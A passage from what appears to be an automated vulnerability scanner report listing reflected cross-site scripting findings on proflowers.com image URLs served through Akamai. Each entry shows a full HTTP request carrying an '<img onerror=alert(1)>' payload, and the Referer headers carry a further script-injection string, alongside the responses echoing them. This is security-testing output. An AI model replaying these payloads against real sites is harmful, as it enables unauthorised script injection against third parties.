Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:23 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img src=a onerror=alert(1)>73aa06e9372

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be was submitted in the REST URL parameter 9. This input was echoed as 6d67c<img src=a onerror=alert(1)>ec1cb1d74be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:16 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img src=a onerror=alert(1)>ec1cb1d74be

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83 was submitted in the REST URL parameter 9. This input was echoed as 4e4c1<img src=a onerror=alert(1)>b4e9f2fec83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img src=a onerror=alert(1)>b4e9f2fec83

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a was submitted in the REST URL parameter 9. This input was echoed as c3599<img src=a onerror=alert(1)>d8063d74a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:15 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img src=a onerror=alert(1)>d8063d74a3a

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6 was submitted in the REST URL parameter 9. This input was echoed as 65a8a<img src=a onerror=alert(1)>8a6382d71f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:09 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img src=a onerror=alert(1)>8a6382d71f6

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e was submitted in the REST URL parameter 9. This input was echoed as c83bd<img src=a onerror=alert(1)>50f64b94a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img src=a onerror=alert(1)>50f64b94a0e

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6 was submitted in the REST URL parameter 9. This input was echoed as 312d2<img src=a onerror=alert(1)>4ee798bbca6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:26 GMT
Connection: close

Unable to find /ProvideCommerce/M519BRR1001210_SQ312d2<img src=a onerror=alert(1)>4ee798bbca6

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af was submitted in the REST URL parameter 9. This input was echoed as 664e8<img src=a onerror=alert(1)>005d15718af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF664e8<img src=a onerror=alert(1)>005d15718af

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff was submitted in the REST URL parameter 9. This input was echoed as 613be<img src=a onerror=alert(1)>a8ba2d3b6ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_pnk11_PF613be<img src=a onerror=alert(1)>a8ba2d3b6ff

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a was submitted in the REST URL parameter 9. This input was echoed as dc33a<img src=a onerror=alert(1)>e55e170119a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img src=a onerror=alert(1)>e55e170119a

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5 was submitted in the REST URL parameter 9. This input was echoed as a266c<img src=a onerror=alert(1)>f1cc77c07c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img src=a onerror=alert(1)>f1cc77c07c5

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212 was submitted in the REST URL parameter 9. This input was echoed as 8217f<img src=a onerror=alert(1)>bd7ea8ed212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQcarnival10_PF8217f<img src=a onerror=alert(1)>bd7ea8ed212

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6 was submitted in the REST URL parameter 9. This input was echoed as fe029<img src=a onerror=alert(1)>0534e1dcbe6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img src=a onerror=alert(1)>0534e1dcbe6

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c was submitted in the REST URL parameter 9. This input was echoed as e3e3e<img src=a onerror=alert(1)>91af06a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img src=a onerror=alert(1)>91af06a583c

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad was submitted in the REST URL parameter 9. This input was echoed as cd0b9<img src=a onerror=alert(1)>27b564570ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img src=a onerror=alert(1)>27b564570ad

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e was submitted in the REST URL parameter 9. This input was echoed as fbefa<img src=a onerror=alert(1)>c7f3acc65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img src=a onerror=alert(1)>c7f3acc65e

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF

Issue detail

